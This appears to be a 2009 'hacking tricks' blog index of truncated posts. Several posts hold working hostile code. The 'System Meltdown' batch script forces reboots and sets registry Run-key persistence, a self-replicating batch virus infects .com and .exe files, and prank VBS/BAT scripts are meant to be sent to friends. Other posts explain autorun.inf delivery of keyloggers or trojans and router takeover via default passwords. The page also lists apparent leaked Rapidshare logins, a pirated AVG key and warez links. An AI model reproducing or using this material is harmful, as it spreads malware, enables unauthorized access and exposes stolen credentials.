DOS ATTACKA denial of service attack (DOS) is when an attacker can make a system unusable or significantly slow for legitimate users by overloading the resources, so that no one can access it. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine by using denial of service attack. Do) is an attack designed to render a computer or network incapable of providing normal services. The most common DoS attacks will target the computer's network bandwidth or connectivity. Bandwidth attacks flood the network with such a high volume of traffic, that's all available network resources are consumed and legitimate user requests cannot get through. Connectivity attacks flood a computer with such a high volume of connection requests, that all available...
Thursday, October 15, 2009
CONVERT RAM TO GRAPHICS CARD

CONVERT RAM TO GRAPHICS CARDVirtual Graphics Card ->Play latest Games without Graphic Cards->Many times we are stuck up with a system that just doesn’t provide enough juice to run the latest game…the result being-->you either spend a pot of money (atleast Rupees 3500 or 70$) for getting the latest graphics card->or you just read reviews of games like Crysis , Far Cry on gamespot and feel like a noob,fully knowing that your system just won’t be able to support it....->Take heart ! Here’s a wicked software with which you can beat 128-256 MB of graphics card requirements with a very modest 1GB DDR2 RAM.link -> http: //www. ziddu....
DISPLAY MESSAGE IN XP BEFORE IT LOADS
DISPLAY MESSAGE IN XP BEFORE IT LOADS1. Go to Start->Run.2. On the Run window type regedit and press Enter.2.Navigate to the key HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon.3.Modify the key legalnoticecaption and write the name of the window you want to appear.4.Modify the key legalnoticetext with what you want the window to say.5.Restart your computer. ..!!....
ALL SOFTWARE COLLECTION
ALL SOFTWARE COLLECTIONPC TOOLS SOFTWAREDesktop Maestro v2.0.0.332File Recovery v6.2.0.16Firewall Plus v3.0.0.60Internet Security 2008Privacy Guardian v4.1.0.37Registry Mechanic v7.0.0.1010Spam Monitor v3.0.0.4Spyware Doctor v5.5.0.204Spyware Doctor with AntiVirus v5.5.204ThreatFire v3.0.14.16AntiVirus v3.6.0.34Download 138mb:http://rapidshare.com/files/98612139/PC_Tools_Software_AiO_-_baseball2525.isohttp://rapidshare.com/files/98612163/PC_Tools_Software_AiO_-_baseball2525.part1.rarhttp://rapidshare.com/files/98612157/PC_Tools_Software_AiO_-_baseball2525.part2.rarScan Before InstallingUtilities DVD 2008Anti-Spyware* Ad-Aware 2007 Pro 7.0.2.6* HijackThis 2.0.2* Spy Sweeper 5.5.7.48* Spybot Search & Destroy 1.5.2* Spyware Blaster 3.5.1* Spyware Doctor 5.5.0.204* SUPERAntiSpyware Professional...
CHECK MOBILE ORGINALITY
CHECK MOBILE ORGINALITYCheck Ur Mobile Phone Quality !! Must See !!Would you like to know your mobile is original or not?!!press *#06# on ur mobileAfter you enter the code you will see a new code contain 15 digits:43 4 5 6 6 1 0 6 7 8 9 4 3 5IF the digit number Seven & Eight is 02 or 20 that mean it was Assembly onEmirates which is very Bad qualityIF the digit number Seven & Eight is 08 or 80 that mean it¢s manufacturedin Germany which is not badIF the digit number Seven & Eight is 01 or 10 that mean it¢s manufactured inFinland which is GoodIF the digit number Seven & Eight is 00 that mean it was manufactured inoriginal factory which is the best Mobile Quality [Like N-Series] ...IF the digit number Seven & Eight is 13 that mean it was Assembly onAzerbaijan which is very...
AVG SERIAL KEY FOR 10 YRS
AVG SERIAL KEY FOR 10 YRSENJOY.!!Key: 8MEH-REDSL-7ETEC-ULA8R-EAOKL-4EMBR-A...
MAKING AUTORUN FROM CD
MAKING AUTORUN FROM CDAlright, lets say that you have coded a great keylogger or trojan or virus something and you are ready to give it to your friend in a pen drive or a CD.. but you are not sure that your friend would double click on the .exe file.. that is, you're not sure if your friend would execute your code..now what?wanna make your code independent? want it to run by itself as soon as the pen drive or CD is inserted in the computer???if yes then just read this...1) You open notepad2) now you writ: [autorun]OPEN=INSTALL\Setup_filename.EXEICON=INSTALL\Setup_filename.EXENow save it but not as a .txt file but as a .inf file.But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are...
SYSTEM MELTDOWN VIRUS

SYSTEM MELTDOWN VIRUSSystem MeltdownSave As A bat File:CRASHnet send * WORKGROUP ENABLEDnet send * WORKGROUP ENABLEDGOTO CRASHipconfig /releaseshutdown -r -f -t0echo @echo off>c:windowshartlell.batecho break off>>c:windowshartlell.batecho shutdown -r -t 11 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /fecho You Have Been Hackedecho @echo off>c:windowswimn32.batecho break off>>c:windowswimn32.batecho...
RAPIDSHARE ACCOUNT 2010

RAPIDSHARE ACCOUNT 2010login: obnaxiouspass: sevda01username = 6988408Password = pNBpxxfYb8Expiration date = Mon, 26. Oct 2009Traffic left = 12000 MBSecurity = SecuredUsername = 84858Password = 60458655Expiration date = Thu, 17. Sep 2009Traffic left = 12000 MBSecurity = SecuredUsername = 6436269Password = HUy8MW3aG3Expiration date = Thu, 10. Sep 2009Traffic left = 12000 MBSecurity = SecuredUsername = bmdylgPassword = b1m2d3ylgExpiration date = Thu, 6. Aug 2009Traffic left = 10883 MBSecurity = SecuredUsername = 5875548Password = tKy2xhNvCRExpiration date = Fri, 17. Jul 2009Traffic left = 12000 MBSecurity = SecuredLogin: 329027Password: 787287Login:...
BLUETOOTH HACKER

BLUETOOTH HACKERBluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?). If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an...
NOTEPAD TRICKS
NOTEPAD TRICKSYou might be using Notepad since long but there are few tricks which are still unknown to you.There few tricks which you can use in notepad. Well quite old but here is d complete collectionStep 1: Open NotepadStep 2: Write following line in the notepad.this app can breakStep 3: Save this file as xxx.txtStep 4: Close the notepad.Step 5: Open the file again.Voilla!!or1> Open Notepad2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters3> DON'T hit enter at the end of the line.4> Save the file.5> Close Notepad.6> Reopen Notepad.7> Open the file you just saved.or1> Open a note pad2> Type Bush hid the facts3> Save that file,4> Close it5> Again open and see...NOTEPAD...
MAKE A FREE CALL TO TELEPHONE AND MOBILE

MAKE A FREE CALL TO TELEPHONE AND MOBILEMake free CALLS from computer on Telephone (100 % free) !Using this VOIP program, you can call landline numbers in any country for FREE.FreeCall is still a Freeware app but you only get 300 minutes a week. To bypass this restriction:Keep the setup.exe. Freecall’s protection system is quite flawed, when the program announces you cannot use any more minutes = Uninstall and reinstall and it will reset your 300 minutes which only takes a moment.A)You MUST make an account with the program when it loads up. Then when your logged in (it will say at the bottom: ‘The client is logged on’)B)Go to the dial pad TAB,...
LOCK YOUR DRIVE AND FOLDER
LOCK YOUR DRIVE AND FOLDERThere are plenty of software which locks drives and folder to protect your confidential data. Why waste money on such tools when you can do it with a simple registry tweak? Here’s how: Caution: Before you attempt these tweaks, please make sure that you have a backup of your registry, just incase something goes wrong in the middle. Locking Folders:Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.Now open the Notepad and type the followingren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}Where xxxx is your folder name. Save the text file as loc.bat in the same drive.Open another new notepad text file and type the followingren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxxSave the text file as key.bat in the same drive.Steps to lock...
MOBILE PHONE VIRUS REMOVING TRICKS

MOBILE PHONE VIRUS REMOVING TRICKSA mobile phone virus or mobile malware – malicious mobile software – is a computer virus specifically adapted for the mobile phone environment and designed to spread from one vulnerable phone to another.A virus is a program code that replicates by being copied to another program. Viruses can be transmitted as attachments to an email or in a download file. Some viruses take effect as soon as their code is executed; other viruses can lie dormant. A virus that replicates by resending itself as an email attachment or as a part of a network message is known as a worm.Viruses can range from benign to quite harmful;...
FINDING INVISIBLE IN YAHOO

FINDING INVISIBLE IN YAHOOMany people nowdays prefer to stay offline while using Yahoo! Messenger -mostly done to avoid someone. There are many ways of finding people who are online but yet invisible.First Method: Doodle Method1. Double Click on the user whose status you want to check.2. A message window will open.3. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.4. The last step and the most important step. After loading the Doodle IMVironment, there will be two possibilities.a) If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously....
VIRUS CODE
VIRUS CODEA simple VIRUS code is here: Just save the following code as .bat extension in notepad.The antivirus will detect it as virus. see for yourself. It will affect *.com and *.EXE files .It will multiply itself and may get more dangerous when altered.@echo off>nul.ViRuSif“%1==”/ViRuS_MULTIPLY goto ViRuS_multiplyif“%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif“%1==”/ViRuS_FINDSELF goto ViRuS_findselfif“%VOFF%==”T goto ViRuS_OLDBATset ViRuSname=%0if not exist %0.bat call %0 /ViRuS_FINDSELF %path%if not exist %ViRuSname%.bat set ViRuSname=if “%ViRuSname%==” goto ViRuS_OLD...
HACK YAHOO WHILE CHATING
HACK YAHOO WHILE CHATINGHACK YAHOO ACCOUNT WHILE CHATTINGThis is only for education purpose.So who ever try this is at his risk.I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocolleave a comment here after u see the post lemme know if it does works or not or u havin a problem post hereFollowing are the feature : -1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.2) When we send files yahoo has 2 optionsa) Either it uploads the file and then the other client has to down load it.b) Either it connects to the client directly and gets the files3) When we use video or audio:-a) It either goes thru the serverb) Or it has client to client connectionAnd...
HIDING DRIVE

HIDING DRIVE 1) Go to Start -> Run -> “regedit”2) Navigate to: HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer3) Choose Edit -> New -> DWORD Value and give name NoDrives.4) Double click NoDrives and determine which drive that you want to vanish in Value Data.Ex: If you wish to vanish drive E:, insert value 16 in Value Data.The combination value in “Value Data” are as following:A: > 1B: > 2C: > 4D: > 8E: > 16F: > 32G: > 64H: > 128I: > 256J: > 512K: > 1024L: > 2048M: > 4096All: > 67108863This is just for the information dont harm anybody plea...
CHANGE THE IP IN 1 MIN
CHANGE THE IP IN 1 MINThis article will help you to change your IP address within a minute. Just follow the following step and you will be thru.1. Click on "Start" in the bottom left hand corner of screen2. Click on "Run"3. Type in "command" and hit okYou should now be at an MSDOS prompt screen.4. Type "ipconfig /release" just like that, and hit "enter"5. Type "exit" and leave the prompt6. Right-click on "Network Places" or "My Network Places" on your desktop.7. Click on "properties"You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.8. Right click on "Local Area Connection" and click "properties"9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General"...
ALL COLECTION VIRUS
ALL COLECTION VIRUSALL OF THEZE ARE TO BE TYPED IN NOTEPAD...1) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!Type :Code:Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loopSave it as "Anything.VBS" and send it.2) Convey your friend a little message and shut down his / her computer:Type :Code:@echo offmsg * I don't like youshutdown -c "Error! You are too stupid!" -sSave it as "Anything.BAT" in All Files and send it.3) Toggle your friend's Caps Lock button simultaneously:Code:Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep...
ADSL HACKING

ADSL HACKINGThis tutorial will explain to you how to hack someone’s internet account through his router. This hack is based on a security exploit of the router’s default password and the stupidity of the user.Explanation: when somebody buy’s a xDSL/Cable router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for. Step 1:Get a multi IP range scanner like superscanner (superscanner is fast and easy...
INCREASE DOWNLOAD SPEED TO 2 MBPS

INCREASE DOWNLOAD SPEED TO 2 MBPSHack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You WishMost of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so onThis tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information...
HACK THE SITE
HACK THE SITEwarning : For educational purpose onlyi know dis is lame but just would like to share wid u.have nothing for next half an hour so typing it.. lolhere are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name...